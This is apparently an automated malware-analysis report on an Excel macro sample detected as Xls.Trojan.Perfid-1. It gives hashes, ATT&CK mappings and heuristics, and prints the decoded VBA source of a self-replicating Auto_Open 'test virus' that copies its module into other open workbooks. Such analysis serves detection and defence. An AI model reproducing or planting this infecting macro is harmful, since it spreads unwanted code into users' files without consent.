Xls.Trojan.Perfid-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 40eb276d629e03d4…

MALICIOUS

Office (OLE)

Size: 38.5 KB
Created: 1999-02-08 09:24:15
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: da2602106e492bbbaaec11875277e33e
SHA-1: 28d79a63c9cc19db599e26c97b37e201aa12c5fc
SHA-256: 40eb276d629e03d4f6b2ec55a0b7fd12f38904b8ead44b2658e3ade86d185bd3
Risk Score: 180

Malware Insights

Xls.Trojan.Perfid-1 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file contains an Auto_Open VBA macro, rated high severity and identified by ClamAV as Xls.Trojan.Perfid-1. When the workbook is opened, the macro spreads to other open Excel workbooks: it looks for one that has no macro modules, adds a description sheet (Tstvr_Descr) to it, and copies its own module (Tstvr) into it. The description sheet tells the user that the file is infected and how to remove the macro, and a message box reports whether the infection succeeded.

Heuristics 3

  • ClamAV: Xls.Trojan.Perfid-1 [critical] [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Xls.Trojan.Perfid-1
  • VBA macros detected [medium] [OLE_VBA_MACROS] (1 related finding)
    Document contains VBA macro code
  • Auto_Open macro [high] [OLE_VBA_AUTO]
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9119 bytes
SHA-256: caa9306959cfd582a69ee3c4197c307dd077001b0be9ce111db9a04504615828
Detection: ClamAV: Xls.Trojan.Perfid-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "Tstvr"

Option Explicit
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
' Test virus version 1.0
' Infects MS-Excel files
' When opened, searches for a victim among currently
' open workbooks
' This version adds an extra sheet to infected workbook telling
' the owner how to remove the virus
' Besides, it displays a message telling whether infection was
' successfull or not
'
Const VirModulName = "Tstvr"
Const DescrSheetName = "Tstvr_Descr"
Dim ActiveName As String  ' Name of the infector file
Dim VictimName As String  ' Name of the victim
Dim InfectSuccess As Boolean ' Indicates that
Dim TestDupNames As Boolean
Dim i As Integer, j As Integer
Dim DummyMsg As Integer
' Initialisation
'
  Application.ScreenUpdating = False
  ActiveName = ActiveWorkbook.Name
  InfectSuccess = False
' Searching for a potential victim
'
  For i = 1 To Workbooks.Count
    If Workbooks(i).Name <> ActiveName Then
' This one could be a victim...
'
      VictimName = Workbooks(i).Name
' Activating victim...
'
      Workbooks(i).Activate
      If Modules.Count = 0 Then
' An infection attempt only will be made when the victim has no macros
'
        On Error Resume Next
        TestDupNames = False
        For j = 1 To Sheets.Count
         If Sheets(j).Name = DescrSheetName Or Sheets(j).Name = VirModulName Then
            TestDupNames = True
            Exit For
         End If
       Next j
       If Not (TestDupNames) Then
         Sheets.Add
         ActiveSheet.Name = DescrSheetName
         If Err = 0 Then
' Description sheet added successfully
'
' Now, adding the description of the virus
' and instructions for removing
'
           Cells(1, 1).Value = "This file was infected by test virus v. 1.0"
             If Err = 0 Then
               Cells(2, 1).Value = "To remove virus, simply close this file without saving it"

             If Err = 0 Then
               Cells(3, 1).Value = "or delete the macro module named " + VirModulName + " and this decsription sheet"
        

' Copying the virus itself
'
                Workbooks(ActiveName).Activate
                Sheets(VirModulName).Copy Before:=Workbooks(VictimName).Sheets(1)
                InfectSuccess = True
                Exit For
            End If
            End If
          End If
        End If
      End If
    End If
  Next i
' Testing if infection was successfull
'
  If InfectSuccess Then
    DummyMsg = MsgBox("Successfully infected workbook " & VictimName, , "Test Virus reports...")
    Workbooks(VictimName).Sheets(DescrSheetName).Activate
  Else
    DummyMsg = MsgBox("Couldn't infect any workbook ", , "Test Virus reports...")
  End If
  Application.ScreenUpdating = True
End Sub 'of test_vir
    

  

... (truncated)